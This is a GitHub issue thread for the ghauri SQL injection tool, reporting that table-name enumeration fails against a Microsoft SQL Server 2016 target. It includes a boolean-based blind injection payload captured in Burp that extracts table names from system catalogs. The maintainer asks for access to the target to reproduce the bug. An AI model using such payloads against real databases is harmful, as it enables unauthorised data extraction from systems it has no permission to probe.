### ISSUE TITLE
Unable to inject the table name

### ISSUE THREAD

**Issue by Richard-Tang** [r0oth3x49/ghauri#88]
**Describe the bug**
get database name is success, get tablename is fail!

**Expected behavior**

![image](https://github.com/r0oth3x49/ghauri/assets/30547741/a2522441-3c18-4eed-94e4-3fd9f8f53aa4)

`--dbs` is success

![image](https://github.com/r0oth3x49/ghauri/assets/30547741/537cc044-8ee2-448a-af57-0ceaa415ffcb)

`--tables` is fail!

![image](https://github.com/r0oth3x49/ghauri/assets/30547741/bf18a6f7-ad3d-4742-a1e6-cb7fd610860b)

Target sqlserver version `Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)`

I used burp to grab the offending payload，But I don't see the problem :(

Is it because the mssql version is too high?

```sql
1') AND UNICODE(SUBSTRING(LTRIM(STR(LEN((SELECT TOP 1 xxxx..sysusers.name CHAR(46) xxxx..sysobjects.name AS table_name FROM xxxx..sysobjects INNER JOIN xxxx..sysusers ON xxxx..sysobjects.uid=xxxx..sysusers.uid WHERE xxxx..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND xxxx..sysusers.name CHAR(46) xxxx..sysobjects.name NOT IN (SELECT TOP 2 xxxx..sysusers.name '.' xxxx..sysobjects.name AS table_name FROM xxxx..sysobjects INNER JOIN xxxx..sysusers ON xxxx..sysobjects.uid=xxxx..sysusers.uid WHERE xxxx..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY xxxx..sysusers.name '.' xxxx..sysobjects.name)ORDER BY xxxx..sysusers.name '.' xxxx..sysobjects.name)))),1,1))>53 OR ('04586'='4586
```

**Desktop (please complete the following information):**
 - OS: MacOS
 - Ghauri: 1.2.1
 - Type of SQL injection which cause the error: boolean
 - Phase where error occur: table

**Comment by r0oth3x49** [comment]
I might need target to reproduce

**Comment by r0oth3x49** [comment]
any update, would you like to share the target on my email: `nasir251292@gmail.com` if not please go ahead and close the issue as if i cannot reproduce i cannot fix it.
